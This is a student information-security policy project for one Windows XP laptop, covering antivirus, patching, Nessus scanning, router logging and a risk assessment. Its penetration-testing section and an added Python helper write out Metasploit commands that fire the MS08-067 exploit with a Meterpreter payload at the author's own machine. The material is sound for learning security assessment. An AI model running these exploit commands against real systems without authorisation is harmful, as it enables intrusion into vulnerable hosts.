
Vantage Point Computing

Benjamin Dahl

Contents
Information Security Policy Document
  Scope
  Overall objectives
Standards
  Antivirus
  Penetration Testing
  Patch Management
  Vulnerability Scanning
  Firewall/Router logging
Procedures
  Antivirus Procedure
  Penetration Testing Procedure
  Patch Management Procedure
  Vulnerability Scanning Procedures
  Firewall/Router logging Procedure
Evidence
  Antivirus
  Penetration Testing
  Patch Management
  Vulnerability Scanning
  Firewall/Router logging
Corrected Risk Assessment
Corrected Control Framework

IS533 Course Project | Vantage Point Computing

Information Security Policy Document


Information is one of the most critical assets in any organization. Proprietary data, information, and knowledge are just as valuable to a business as its tangible assets, and they must be protected and secured as rigorously as those other assets. This is especially important given the growing number of vulnerabilities and threats and the interconnected nature of the business environment. Information exists in many forms: it can be digital or analog, tangible or intangible. Whatever form it takes, controls must be followed in order to secure it. The goal of information security is to protect information from a wide array of threats in order to maximize return on investment, minimize or eliminate risk, and ensure business continuity. This goal is achieved by implementing a suitable set of controls: policies, processes, and procedures. These controls cover hardware, software, and data, and they must be created, implemented, monitored, and reviewed. Where necessary, controls must be revised, amended, or replaced so that they continue to serve the primary goal of information security. To satisfy both the security and the business tenets of the organization, this must be done in conjunction with the other business units.

Scope
The scope of this information security policy document is limited to the Vantage Point Computing business network (SPACEBRIDGE), specifically the laptop (WHEELJACK), which is the primary device connecting to that network.

Overall objectives
The importance of information sharing is critical in the increasingly interconnected business environment. Security of this information is paramount because information loses value when it is compromised. If the hardware, software, or information is compromised in any way, full availability cannot be ensured. Given the nature of the business, the laptop must be available to ensure continued business operations. Because of the sensitive information contained on the laptop, security controls must be followed by all users in order to reduce risk and maximize output. All users are required to attend training on all policies, procedures, and standards in this document, and to certify that they have read and understood it. The following standards are covered in this document:
- Antivirus: BitDefender Game Safe, real-time antivirus protection
- Penetration Testing: Metasploit
- Patch Management: Windows Automatic Updates and Microsoft Baseline Security Analyzer (MBSA)
- Vulnerability Scanning: Tenable Nessus 4.0.1
- Firewall/Router Logging: D-Link DGL4300 router logging


Vantage Point Computing is concerned with the security of all assets, whether physical or non-physical. As such, the following requirements must be adhered to:
- Compliance with all information presented in this document, including, but not limited to, keeping all software at its current version.
- Compliance with the contractual requirements agreed upon with the instructor.

Vantage Point Computing considers increased awareness and continued education to be of the utmost importance. The following vendors and organizations provide this security education, training, and awareness:
- CompTIA [http://www.comptia.org/]
- DePaul University [http://www.depaul.edu]
- DarkReading [http://www.darkreading.com/]
- US-CERT [http://www.us-cert.gov/]
- NIST [http://csrc.nist.gov/]

Vantage Point Computing recommends the A+, N+, and Security+ training from CompTIA. DePaul University offers security-focused classes taught by James Krev; Vantage Point Computing recommends all of these classes (specifically IS433 and IS533). US-CERT, NIST, and DarkReading all provide information, updates, and articles on current security topics, issues, and threats. These resources should be consulted on a weekly basis.


Standards
Antivirus

Description:
BitDefender Game Safe [BitDefender Game Safe]
- Protects systems in real time from viruses, spyware, and malware.
- Includes a software firewall to control application access to the Internet.
- Includes Gamer Mode, which allows preferred applications to access the Internet without disabling the firewall.
- Compatible with all Vantage Point Computing systems.

Implementation:
BitDefender Game Safe is installed and configured on all Vantage Point Computing systems. These systems include: WHEELJACK, AUTOBOTS, DECEPTICONS, ASTROTRAIN, HOTROD, SOUNDBEAK, and STARSCREAM. The software is installed through a single installation file located on the Vantage Point Computing server with a multiple user license.

Configuration:
BitDefender Game Safe is configured with the following options:
- Antivirus / Antispyware
- Antiphishing
- Outlook E-mail protection
- Gamer Mode
  - All alerts and notifications are disabled
  - Real-time Protection set to Permissive
  - Firewall set to Game Mode to accept incoming connections
  - Must be enabled with the Alt+G hotkey
- Automatic Updates
  - Silent update every 5 hours
  - Does not update if a scan is in progress
  - Does not update if Game Mode is on
- Full System Scan
  - Daily Scan
    - Scan all files
    - Scan for viruses and spyware
    - Minimize scan window to the system tray
    - Schedule: Daily 3:00am
  - Deep System Scan
    - Scan all files
    - Scan for viruses and spyware
    - Scan archives
    - Scan for hidden files and processes
    - Schedule: Sunday 3:00am
Note that Gamer Mode relaxes real-time protection, opens the firewall to incoming connections, and suspends definition updates for as long as it is on; it is therefore off unless a user has explicitly enabled it with the hotkey, and it should be turned off again as soon as it is no longer needed.


Penetration Testing

Description:
Metasploit [Metasploit]
- On-demand penetration testing tool.
- Includes a comprehensive list of exploits and packages for testing.
- Allows the user to test individual exploits.
- Compatible with all Vantage Point Computing systems.

Implementation:
Metasploit is installed and configured on the WHEELJACK computer, part of the SPACEBRIDGE workgroup. The software is installed through a downloadable installation file located on the Vantage Point Computing server.

Configuration:
Metasploit is configured with the following options:
- Exploit: windows/smb/ms08_067_netapi (Microsoft Server Service Relative Path Stack Corruption)
- Target: netapi32.dll (Windows Server service, LAN Manager)
- Payload: windows/meterpreter/bind_tcp (Meterpreter over a bind TCP stager; the payload opens a listening port on the target and the tester connects to it)
- Remote Host (RHOST): WHEELJACK's local IP address (192.168.0.197)


Patch Management

Description:
Windows Automatic Updates
- Automatic updates for the Windows operating system.
- Compatible with all Windows systems.
Microsoft Baseline Security Analyzer [MBSA]
- On-demand scanning for Microsoft vulnerabilities and missing security updates.
- Allows analysis of the system against Microsoft's recommended configuration.
- Compatible with all Windows systems.

Implementation:
Windows Automatic Updates are configured on the WHEELJACK computer, part of the SPACEBRIDGE workgroup. MBSA is installed and configured on the WHEELJACK computer, part of the SPACEBRIDGE workgroup. The software is installed through a downloadable installation file located on the Vantage Point Computing server.

Configuration:
Windows Automatic Updates are configured with the following options:
- Automatic
- Every day at 2:00 am
MBSA is configured with the following options:
- Computer: SPACEBRIDGE\WHEELJACK
- Check for Windows administrative vulnerabilities
- Check for weak passwords
- Check for IIS administrative vulnerabilities
- Check for SQL administrative vulnerabilities
- Check for security updates


Vulnerability Scanning

Description:
Tenable Nessus 4.0.1 [Nessus]
- Patch, configuration, and content auditing.
- Constantly updated vulnerability library.
- Network assessment.
- Determines weak points in system security.

Implementation:
Tenable Nessus is installed and configured on the WHEELJACK computer, part of the SPACEBRIDGE workgroup. The software is installed through a single downloadable installation file located on the Vantage Point Computing server.

Configuration:
Nessus is configured with the following options:
- Network: Loopback (127.0.0.1)
- Default Scan Policy:
  - Options:
    - Safe Checks enabled
    - Log details on the server
  - Plugins:
    - Backdoors
    - Peer-to-Peer File Sharing
    - Windows
    - Windows: Microsoft Bulletins
    - Windows: User Management
Because the scan targets the loopback address from the Nessus server running on WHEELJACK itself, it reports services bound only to localhost and does not exercise the host firewall rules applied to the LAN interface; a scan of 192.168.0.197 from another SPACEBRIDGE host gives the network-facing view.


Firewall/Router Logging

Description:
Logging is enabled for the D-Link DGL4300 router [DGL4300]
- Primary link between all Vantage Point Computing systems and the Internet.
- Provides 108Mbps 802.11g wireless connectivity.
- 4 Gigabit Ethernet ports.
- 1 WAN port.
- Logging enabled to assess incidents.
- Compatible with all Vantage Point Computing systems.

Implementation:
The DGL4300 router is configured as the primary router for Vantage Point Computing.

Configuration:
DGL4300 logging is configured with the following options:
- What to View:
  - Firewall & Security
  - System
  - Router Status
- View Levels:
  - Critical
  - Warning
  - Informational


Procedures
Antivirus Procedure
1. Execute bitdefender_gamesafe.exe.
2. Click Next.
3. Click Next.
4. Select "I accept the License Agreement", then click Next.
5. Click Next.
6. Click Install.
7. Deselect "Run a quick system scan (may require reboot)" and "Schedule a full system scan every day at 2 AM", then click Next.
8. Allow BitDefender to update, then click OK.
9. Click Next.
10. Click Finish.
11. Click Yes to restart the computer and apply changes.
12. After the system restarts, select "My computer is connected to a home, office or trusted network" and click OK.
13. After BitDefender loads, click Settings.
14. Click Custom Level.
15. Configure the settings as follows (per the Configuration section of the Antivirus standard) and click OK.
16. Select the Scan tab and then click New Task.
17. Configure the settings as follows and click Custom.
18. Configure the settings as follows and click OK.
19. Select the Scan Path tab and configure as follows.
20. Select the Scheduler tab and configure as follows, then click OK.
21. Select the Firewall option on the left and configure as follows.
22. Click Advanced, configure as follows, and then click OK.
23. Click Close.
24. Close BitDefender.


Penetration Testing Procedure


1. Execute framework-3.2.exe.
2. Click Next.
3. Click I Agree.
4. Click Next.
5. Click Install.
6. Click Yes.
7. Click I Agree.
8. Click Next.
9. Click Install.
10. Click I Agree.
11. Click Next.
12. Click Next.
13. Click Finish.
14. Click Next.
15. Click Next.
16. Click Finish.
17. Click Finish.
18. Click Window.
19. Click Console.
20. Type show exploits and press Enter.
21. The available exploits are listed.
22. Type use windows/smb/ms08_067_netapi and press Enter.
23. Type show payloads and press Enter.
24. Type set payload windows/meterpreter/bind_tcp and press Enter.
25. Type set rhost XXX.XXX.XXX.XXX, where XXX.XXX.XXX.XXX is the local IP address of the machine being tested. The local IP address of WHEELJACK is 192.168.0.197.
26. Press Enter.
27. Type exploit and press Enter.
28. The vulnerability is triggered and the results are displayed.
29. Click the red X to close the Metasploit Console.
30. Click the red X to close Metasploit.


Patch Management Procedure


1. Double-click MBSASetup-x86-EN.msi.
2. Click Next.
3. Select "I accept the license agreement" and click Next.
4. Click Next.
5. Click Install.
6. Click OK in the confirmation window.
7. Launch Microsoft Baseline Security Analyzer 2.1 from your desktop.
8. Click Scan a computer.
9. Click Start Scan.
10. Review the output of the scan.
11. Click OK.
12. Click the red X to close MBSA.
13. Click Start in the Windows taskbar.
14. Click Control Panel.
15. Double-click Security Center.
16. Click Turn on Automatic Updates.
17. Click Automatic Updates in the "Manage security settings for:" section.
18. Select Automatic.
19. Change the "Every day" time to 2:00am.
20. Click OK.
21. Click the red X to close Windows Security Center.


Vulnerability Scanning Procedures


1. Double-click Nessus-4.0.1-i386.msi.
2. Click Next.
3. Select "I accept the license agreement" and click Next.
4. Click Next.
5. Click Next.
6. Click Install.
7. Click Finish, then launch Nessus Server Manager from your desktop.
8. Verify that the Nessus server is running, or click Start Server.
9. Click the red X to close Nessus Server Manager.
10. Launch Nessus Client from your desktop.
11. Click + in the "Networks to scan:" section.
12. Type 127.0.0.1 in "Host name:" and click Save.
13. Click Connect in the bottom left.
14. Click Connect.
15. Click + in the "Select a scan policy:" section.
16. Enter the desired policy name in the "Policy name:" field.
17. Click the Options tab.
18. Check Safe Checks.
19. Check "Log details of the scan on the server".
20. Click the Plugins tab.
21. Check Backdoors.
22. Check Peer-To-Peer File Sharing.
23. Check Windows.
24. Check Windows : Microsoft Bulletins.
25. Check Windows : User Management.
26. Click Save.
27. Select the policy that was created.
28. Click Scan Now.
29. Review the report details.
30. Click Export...
31. Choose the location and file name for your report and click Save.
32. Click the red X to close Nessus.

Firewall/Router Logging Procedure


1. Open a web browser (Internet Explorer or Firefox).
2. Enter the router's address (192.168.0.1).
3. Enter your router password.
4. Click Log In.
5. The Status page loads.
6. Click Logs in the left menu.
7. Check the Firewall & Security checkbox.
8. Check the System checkbox.
9. Check the Router Status checkbox.
10. Check the Critical checkbox.
11. Check the Warning checkbox.
12. Check the Informational checkbox.
13. Click Apply Log Settings Now.
14. Click OK in the confirmation window.


Evidence
Antivirus
1. Verify that PC SECURITY, NETWORK SECURITY, and IDENTITY CONTROL all show Protected.
2. Click History.
3. Select the most recently completed scan.
4. Right-click the scan and click Open.
5. Click "View Scan Log".
6. Review the .xml file (C:\Documents and Settings\All Users\Application Data\BitDefender\Desktop\Profiles\Logs\full_scan\1241971935_1_02.xml) for any issues.
7. Close the BitDefender log file.
8. Select Firewall.
9. Review the firewall events.
10. Click Update.
11. Review the update events.
12. Click OK.
13. Close BitDefender.


Penetration Testing
1. View the output of the Metasploit vulnerability test.
2. Verify that the exploit completed but no session was created. With the bind_tcp payload, Metasploit prints the same "Exploit completed, but no session was created" message when the exploit succeeded but the tester could not connect to the port the payload opened on the target (for example because the host firewall dropped the inbound connection), so if BitDefender's firewall was active during the test, corroborate the result with the MBSA security-update results for the MS08-067 update.
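The console commands in steps 20 to 27 of the Penetration Testing Procedure, together with the pass/fail decision in step 2 above, as an added example that is not part of the original project: a small Python helper that writes the commands out as an msfconsole resource script and classifies a console transcript. The resource-script format (one console command per line, run with msfconsole -r) is real Metasploit behaviour; the two transcripts embedded in the block are constructed to resemble msfconsole output and were not captured from WHEELJACK.

```python
"""Penetration Testing Procedure steps 20-27 as an msfconsole resource script,
plus the pass/fail decision from the Penetration Testing evidence step.

Added example for this page, not code from the original project.  The
resource-script format (one console command per line, run with
`msfconsole -r wheeljack.rc`) is real Metasploit behaviour; the two
transcripts below are constructed to resemble msfconsole output and were
not captured from WHEELJACK."""
import re

EXPLOIT = "windows/smb/ms08_067_netapi"   # exploit named in the standard
PAYLOAD = "windows/meterpreter/bind_tcp"  # payload named in the standard
RHOST = "192.168.0.197"                   # WHEELJACK's LAN address per the standard


def resource_script(exploit=EXPLOIT, payload=PAYLOAD, rhost=RHOST, lport=None):
    """Return the console commands from steps 22-27 as the body of a .rc file."""
    lines = [f"use {exploit}", f"set PAYLOAD {payload}", f"set RHOST {rhost}"]
    if lport is not None:
        lines.append(f"set LPORT {lport}")  # port the bind payload listens on
    lines.append("exploit")
    return "\n".join(lines) + "\n"


# Result lines msfconsole prints at the end of an exploit run.
_SESSION = re.compile(r"^\[\*\] (?:Meterpreter|Command shell) session \d+ opened", re.M)
_NO_SESSION = re.compile(r"^\[\*\] Exploit completed, but no session was created\.", re.M)
_FAILED = re.compile(r"^\[-\] Exploit failed", re.M)


def classify(transcript):
    """Map a console transcript to: session, failed, no_session or unknown."""
    if _SESSION.search(transcript):
        return "session"
    if _FAILED.search(transcript):
        return "failed"
    if _NO_SESSION.search(transcript):
        return "no_session"
    return "unknown"


def verdict(transcript, payload=PAYLOAD):
    """Turn the classification into the PASS/FAIL the evidence step records.

    'no_session' is the expected result for a patched host.  With a bind_*
    payload the same line also appears when the exploit worked but the tester
    could not connect to the port the payload opened on the target (e.g. the
    host firewall dropped the inbound connection), so that case is flagged
    for corroboration rather than reported as a clean pass.
    """
    kind = classify(transcript)
    if kind == "session":
        return "FAIL", "a session was opened: the host is exploitable"
    if kind == "failed":
        return "INCONCLUSIVE", "the exploit did not run to completion; fix the error and rerun"
    if kind == "no_session":
        if payload.rsplit("/", 1)[-1].startswith("bind_"):
            return "PASS", "no session; bind payload used, confirm the bind port was reachable"
        return "PASS", "no session was created"
    return "INCONCLUSIVE", "transcript contained no recognised result line"


# Constructed transcripts (not real output from WHEELJACK).
PATCHED_RUN = """\
[*] Started bind handler
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
"""
UNPATCHED_RUN = """\
[*] Started bind handler
[*] Triggering the vulnerability...
[*] Meterpreter session 1 opened (192.168.0.197:1042 -> 192.168.0.197:4444)
"""

if __name__ == "__main__":
    print(resource_script())
    for name, run in (("patched", PATCHED_RUN), ("unpatched", UNPATCHED_RUN)):
        print(name, *verdict(run))
```

Save the output of resource_script() as wheeljack.rc and run msfconsole -r wheeljack.rc to replay the procedure without retyping steps 22 to 27; paste the console output into verdict() to get the evidence result. A reverse payload (windows/meterpreter/reverse_tcp) avoids the bind-port ambiguity because the target connects back to the tester instead.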


Patch Management
1. Review the Automatic Updates section of Windows Security Center.
2. Open the .mbsa file from %userprofile%\SecurityScans.
3. Verify the update log.
4. Visual Studio was removed from WHEELJACK.
5. SQL services have been stopped.
6. The Office service pack was installed, but is not recognized.


Vulnerability Scanning
1. Open the Nessus report file.
2. Verify that there are no Medium or High vulnerabilities.
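The check in step 2, as an added example that is not part of the original project: a Python script that reads an exported Nessus report and fails the evidence check when any finding is rated Medium or higher. It assumes the report was exported in the .nessus v2 XML format (NessusClientData_v2, the format of Nessus 4.2 and later; the 4.0.1 client on this page may export an older format or HTML, which this parser does not read). The report embedded in the block is constructed for illustration and is not a scan result from WHEELJACK; it contains one Medium finding modelled on the RDP observation in the risk assessment so that the failing path is exercised.

```python
"""Vulnerability Scanning evidence step 2: no Medium or High findings.

Added example for this page, not code from the original project.  Assumes
the .nessus v2 XML export format (NessusClientData_v2); the embedded report
is constructed for illustration, not a scan of WHEELJACK."""
import xml.etree.ElementTree as ET

# Nessus severity attribute values; 4 (Critical) only exists in later versions.
SEVERITY = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}
THRESHOLD = 2  # Medium and above fail the evidence check

# Constructed sample report (not real scanner output).
SAMPLE_REPORT = """<?xml version="1.0"?>
<NessusClientData_v2>
  <Report name="WHEELJACK loopback scan">
    <ReportHost name="127.0.0.1">
      <HostProperties><tag name="host-ip">127.0.0.1</tag></HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="0"
                  pluginName="SMB Service Detection" pluginFamily="Windows">
        <description>An SMB server is running on this port.</description>
      </ReportItem>
      <ReportItem port="3389" svc_name="msrdp" protocol="tcp" severity="2"
                  pluginName="Remote Desktop Protocol server not using SSL/TLS"
                  pluginFamily="Windows">
        <description>The RDP server does not authenticate itself with SSL/TLS.</description>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


def parse_findings(nessus_xml):
    """Return one dict per ReportItem: host, port, protocol, severity, name."""
    root = ET.fromstring(nessus_xml)
    findings = []
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port", "0")),
                "protocol": item.get("protocol", ""),
                "severity": int(item.get("severity", "0")),
                "name": item.get("pluginName", ""),
            })
    return findings


def failing_findings(findings, threshold=THRESHOLD):
    """Findings at or above the threshold severity (Medium by default)."""
    return [f for f in findings if f["severity"] >= threshold]


def evidence_check(nessus_xml):
    """Return (passed, message) for the evidence step.

    Also notes when every scanned host is the loopback address: such a scan
    never exercises the host firewall rules on the LAN interface and can list
    services bound only to localhost, so it is not the network-facing view."""
    findings = parse_findings(nessus_xml)
    failing = failing_findings(findings)
    hosts = {f["host"] for f in findings}
    notes = []
    if hosts and hosts <= {"127.0.0.1", "localhost"}:
        notes.append("scan targeted loopback only; rescan 192.168.0.197 from "
                     "another host to reflect LAN exposure")
    suffix = (" | " + "; ".join(notes)) if notes else ""
    if failing:
        listing = "; ".join(f"{SEVERITY[f['severity']]} {f['protocol']}/{f['port']} {f['name']}"
                            for f in failing)
        return False, "FAIL: " + listing + suffix
    return True, "PASS: no Medium or High findings" + suffix


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_REPORT
    passed, message = evidence_check(text)
    print(message)
    sys.exit(0 if passed else 1)
```

Run it with the exported report path as the only argument; the exit status (0 pass, 1 fail) lets the check be scripted into the quarterly evidence collection. The threshold is a parameter so the same script can be tightened to fail on Low findings if the standard is revised.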


Firewall/Router logging
1. Review the Log Details section of the router's Logs page.


Corrected Risk Assessment


I. Introduction

The purpose of this assessment is to observe and address risks to the WHEELJACK laptop operating on the SPACEBRIDGE network. Performing this risk assessment allows threat sources and threat actions to be discovered, quantified, and addressed later in a more effective manner. Ultimately it allows this business-critical system to be hardened to maximize availability. The scope of this assessment is a single portable system, WHEELJACK. This system is an Averatec EV3715-EH1 AMD-based laptop running Windows XP Professional Service Pack 3. It connects to three different networks on a regular basis: SPACEBRIDGE (home office), HALPNT (work), and DePaul. The system has only one user, and there are no additional administrator or guest accounts.

II. Risk Assessment Approach

The only member of the risk assessment team is the business owner/custodian Ben Dahl. Two techniques were used to gather information for the assessment. Tenable Nessus v3.2.1.1 (build 2G301_Q) was used to scan the machine for open ports and vulnerabilities. In addition, Microsoft Baseline Security Analyzer v2.1 was used to determine whether any Microsoft system patches were missing. The risk scale for this assessment uses three levels: high, medium, and low.
- High risk denotes a threat that has a high likelihood of occurring and represents a critical system threat. This may include missing critical updates, vulnerabilities that have not been patched, and open firewall ports.
- Medium risk denotes a threat that could occur but does not represent a critical system threat. This may include missing non-critical updates and software updates.
- Low risk denotes a threat that has a low likelihood of occurring and represents an inconvenience. This may include lack of surge protection, improper documentation, and low-priority updates.

III. System Characterization

This document is concerned with the WHEELJACK laptop, the local hardware and software utilized by this machine, and the primary business owner/data custodian Ben Dahl. The primary mission of this system is portable completion of work and school projects (a technological tether). The system is also used for Internet access, desktop publishing, data storage, and music management. It interfaces to the SPACEBRIDGE, HALPNT, and DePaul networks via wired, wireless, and TightVNC connections. The system contains personal data (contacts, media, and university work), business information (project documents), cookies, and the following:

Hardware:
- Averatec EV3715-EH1
- AMD Sempron 3000 (1.8 GHz)
- 1 GB Corsair DDR3200
- Toshiba MK8025GAS 80 GB
- Atheros AR5212 A/B/G
- Comcast Surfboard
- D-Link DGL4300
- Linksys WRT54GL
- Patriot Xporter XT 16 GB


Software:
- Windows XP Pro SP3
- Office Pro 2007 Enterprise
- Adobe Reader 9.1
- Mozilla Firefox 3.0.8
- Acronis True Image
- TrueCrypt
- DD-WRT Linksys firmware

The system has been classified as Business Critical with confidential data sensitivity.

IV. Threat Statement

Threat Source: Machine could be lost by user.
  Threat Actions: System could be left at DePaul; system could be left at Harris Associates; system could be left in public.
Threat Source: The system could be compromised by an attacker.
  Threat Action: Unauthorized access to sensitive information.
Threat Source: A natural disaster could compromise the availability of the system.
  Threat Actions: Power outage could make the system unusable; flood could lead to destruction of the machine; tornado could lead to destruction of the machine.
Threat Source: System could be stolen by a third party.
  Threat Actions: System could be stolen if left in public; system could be stolen if left unsecured.
Threat Source: Missing-updates vulnerability.
  Threat Action: System could be compromised by viruses or malware.
Threat Source: Unsecure networks.
  Threat Action: The DePaul or HALPNT network could become compromised and corrupt the system.
Threat Source: Remote connection vulnerability.
  Threat Action: System could be compromised if connected to an unsecure VPN.
Threat Source: Data compromise or corruption.
  Threat Action: While using thumb drives, information transmitted could become compromised or corrupted.

V. Risk Assessment Results

Observation 1: System is vulnerable due to missing operating system or software updates or incomplete installation
The system is missing 33 security updates which, if discovered by an attacker, could be used to compromise the confidentiality, integrity, or availability of the system.
- Existing controls: The system is protected by hardware and software firewalls. The system is protected by strong passwords. The system is backed up on a regular basis. Nessus and MBSA are used for vulnerability and patch analysis.
- Likelihood is low: The system has been operational for approximately two years without issue. The system is only powered on approximately three hours a day. Windows Service Pack 3 was installed on the machine soon after release, which decreased the likelihood of an issue.
- Magnitude of impact is low: The system can be repaired inexpensively; data is encrypted and backed up.
- Risk rating is low: Low likelihood and low magnitude of impact, along with cost/benefit, make this a low risk.
- Recommendation: Implement automatic updates for Windows and Microsoft Office, and run Nessus and MBSA scans more frequently.

Observation 2: Windows RDP Terminal Service is not run through SSL


Windows Remote Desktop Protocol is vulnerable because it is not run over an SSL/TLS-protected transport. If discovered, this Nessus-rated "medium" finding could be used to intercept communications that are assumed to be secure.
- Existing controls: Firewalls, routers, and the TOR anonymity network.
- Likelihood is low: RDP is only used locally, so interception would require an attacker to be on the local network.
- Impact is low: No confidential transactions are processed through RDP.
- Risk rating is low: Secure VPN tunnels are used for remote access over the Internet.
- Recommendation: Implement an SSL/TLS solution for RDP.

Observation 3: Data loss due to lost or stolen system or USB drive
The system or its information can be compromised through loss or theft.
- Existing controls: TrueCrypt for USB drive and system drive encryption. StuffBak registration for the system in the event of loss or theft. The system is personalized and would not easily be moved to third parties. The system has strong BIOS and operating system passwords. Additional administrator and guest accounts have been disabled.
- Likelihood is medium: Loss or theft is unpredictable by nature.
- Magnitude of impact is low: Information on the USB drives and the system is automatically backed up differentially twice a week.
- Risk rating is low: Should the USB device or laptop be compromised, the information is still available and protected. The hardware is easily replaced at an acceptable cost and spare systems are available.
- Recommended controls: Implement a password expiration policy and more frequent backups.

Observation 4: System compromised due to malware
The system can become compromised in terms of confidentiality, integrity, or availability due to malware.
- Existing controls: Full and differential Acronis True Image backups. A hardened system with very few open ports and vulnerabilities. Router and system logging is implemented for auditing purposes.
- Likelihood is medium: Malware is everywhere, but the system does not connect to any unprotected networks.
- Impact is low: In the event the system is compromised, no more than 48 hours of work will be lost.
- Risk rating is low: Based on the risk matrix, the risk is low.
- Recommended controls: Implement an antivirus solution.

VI. Summary

Observation: System is vulnerable because of missing updates or software
  Risk Level: Low
  Recommendation: Implement Automatic Updates and frequent Nessus and MBSA scans
  Comments: This requires minimal user input and can be automated.

Observation: Microsoft RDP SSL vulnerability
  Risk Level: Low
  Recommendation: Implement the Microsoft RDP SSL update
  Comments: This is a one-time setup update, but will not be implemented due to TOR and VNC.

Observation: Data loss due to lost or stolen system or USB drive
  Risk Level: Low
  Recommendation: Implement more frequent backups and a password expiration policy
  Comments: All information must be completely secured.

Observation: System compromised due to viruses or malware
  Risk Level: Low
  Recommendation: Implement antivirus/antimalware
  Comments: This is a low risk, but protection is a necessity.
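The ratings in Observations 1 through 4 invoke a risk matrix that the assessment does not print. As an added worked example that is not part of the original project, the block below applies the likelihood/impact matrix from NIST SP 800-30 (2002), section 3.7, which is assumed here to be the matrix the assessment used, to the likelihood and impact values stated in the four observations. The short observation labels are mine, not text from the assessment.

```python
"""Worked risk matrix for the four observations in the Corrected Risk Assessment.

Added example for this page, not code from the original project.  The
likelihood weights, impact values and rating bands are the ones in NIST
SP 800-30 (2002), section 3.7; that this is the matrix the assessment used is
an assumption.  The observation labels are shortened and are not quotations."""

# Likelihood weight and impact value per NIST SP 800-30 (2002) table 3-6.
LIKELIHOOD = {"low": 0.1, "medium": 0.5, "high": 1.0}
IMPACT = {"low": 10, "medium": 50, "high": 100}


def risk_score(likelihood, impact):
    """Risk = likelihood weight x impact value (1 to 100)."""
    return LIKELIHOOD[likelihood.lower()] * IMPACT[impact.lower()]


def risk_level(score):
    """Bands from the same table: Low 1-10, Medium >10-50, High >50-100."""
    if score > 50:
        return "High"
    if score > 10:
        return "Medium"
    return "Low"


def rate(likelihood, impact):
    return risk_level(risk_score(likelihood, impact))


# Likelihood and magnitude of impact exactly as stated in Observations 1-4.
OBSERVATIONS = [
    ("Missing OS/software updates", "low", "low"),
    ("RDP not run through SSL", "low", "low"),
    ("Lost or stolen system/USB drive", "medium", "low"),
    ("Malware compromise", "medium", "low"),
]


def summary(observations=OBSERVATIONS):
    """(label, rating) for each observation; reproduces the Summary table."""
    return [(label, rate(likelihood, impact)) for label, likelihood, impact in observations]


def matrix():
    """The full 3x3 table, to see which change of likelihood or impact would
    move an observation out of Low (for example medium likelihood with medium
    impact is already Medium)."""
    return {(lk, im): rate(lk, im) for lk in LIKELIHOOD for im in IMPACT}


if __name__ == "__main__":
    for label, rating in summary():
        print(f"{label:35} {rating}")
    for (lk, im), rating in matrix().items():
        print(f"likelihood={lk:6} impact={im:6} -> {rating}")
```

The matrix makes the assessment's reasoning explicit: every observation is rated Low because the impact is Low, and with Low impact even High likelihood scores only 10. The ratings in Observations 3 and 4 therefore rest entirely on the backup and encryption controls that keep the impact Low, which is what an auditor would want to verify first.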


Corrected Control Framework


Control Objective #1: 5.1 Information Security Policy
To provide management direction and support for information security in accordance with business requirements and relevant laws and regulations.

Risk Mitigation: To ensure that management has identified the information security program requirements and that employees understand the program's intent.

Control 1.1: Information Security Policy Document (Annual)
  Control Description: An information security policy document is approved by management, published, and communicated to all employees and relevant external parties.
  Testing Steps:
    1. Obtain a copy of the information security policy document and verify that it defines the program's intent, compliance with legislation, commitment to security awareness and training, and a brief explanation of the security standards and procedures.
  Evidence Requested:
    1. Provide a copy of the information security policy document.
  Point of Contact: Ben


Control Objective #2: 10.4.1 Antivirus Software
Detection, prevention, and recovery controls to protect against malicious code and appropriate user awareness procedures are implemented.

Risk Mitigation: To prevent the introduction of malicious software that could negatively impact the organization's information systems.

Control 2.1: Antivirus Standard (Weekly)
  Control Description: An antivirus standard is documented and implemented to provide a consistent and uniform process for updating systems with the latest virus definition files on a predefined schedule.
  Testing Steps:
    1. Obtain a copy of the malicious software standard and the related procedures and examine them to determine whether they are being followed.
    2. Test the system to determine whether the virus definition updates were applied according to the procedures and in a timely manner.
  Evidence Requested:
    1a. Provide a copy of the malicious software standard and procedures.
    1b. Provide a copy of the schedule for virus definition updates.
    2. Provide a system-generated list or report showing when the last virus definition updates were applied.
  Point of Contact: Ben


Control Objective #3: 15.2.2 Penetration Testing

Timely information about technical vulnerabilities of information systems being used should be obtained, the organization's exposure to such vulnerabilities evaluated, and appropriate measures taken to address the associated risk.

Risk Mitigation: To provide protection from malicious code by offensively testing systems for exploits and vulnerabilities.

Control 3.1 Penetration Testing Standard (Quarterly)

Control Description: A penetration testing standard is documented and implemented to assess and quantify critical system exploits and vulnerabilities.

Testing Steps:
1. Obtain a copy of the Penetration Testing Standard.
2. Review the latest penetration test results.

Evidence Requested:
1. Provide a copy of the penetration test standard and procedures.
2. Provide a copy of the results from the penetration test.
3. Provide a report outlining potential fixes for issues discovered.

Point of Contact: Ben


Control Objective #4: 12.6 Patch Management

To reduce risks resulting from exploitation of published technical vulnerabilities.

Risk Mitigation: To ensure that systems are updated with the newest patches for known vulnerabilities.

Control 4.1 Patch Management Standard (Weekly)

Control Description: A patch management standard is documented and implemented to ensure that systems have the most current patches installed.

Testing Steps:
1. Obtain a copy of the patch management standard and examine it and the related procedures to determine if they are being followed.
2. Test the system to determine if the patch updates were applied according to the procedures outlined and implemented in a timely manner.

Evidence Requested:
1. Provide a copy of the Patch Management Standard.
2. Provide a screenshot of the patch management configuration, and a screenshot that shows the most recent system patches.

Point of Contact: Ben


Control Objective #5: 15.2.2 Vulnerability Scanning

Information systems should be regularly checked for compliance with security implementation standards.

Risk Mitigation: To ensure that assets remain protected from known exploits or vulnerabilities that may compromise or otherwise harm an asset.

Control 5.1 Technical Compliance Standard (Weekly)

Control Description: A technical compliance standard is documented and implemented to describe the process that should be followed to determine if vulnerabilities are present, and how to become compliant should any be found.

Testing Steps:
1. Obtain a copy of the standard.
2. Obtain the latest scan reports.

Evidence Requested:
1. Provide a copy of the standards and procedures.
2. Provide a copy of the outputs of the vulnerability scan. Provide a copy of the resulting report that states that the vulnerabilities have been corrected.

Point of Contact: Ben


Control Objective #6: 10.10.1 Firewall & Router Logging

Audit logs recording user activities, exceptions, and information security events should be produced and kept for an agreed period to assist in future investigations and access control monitoring.

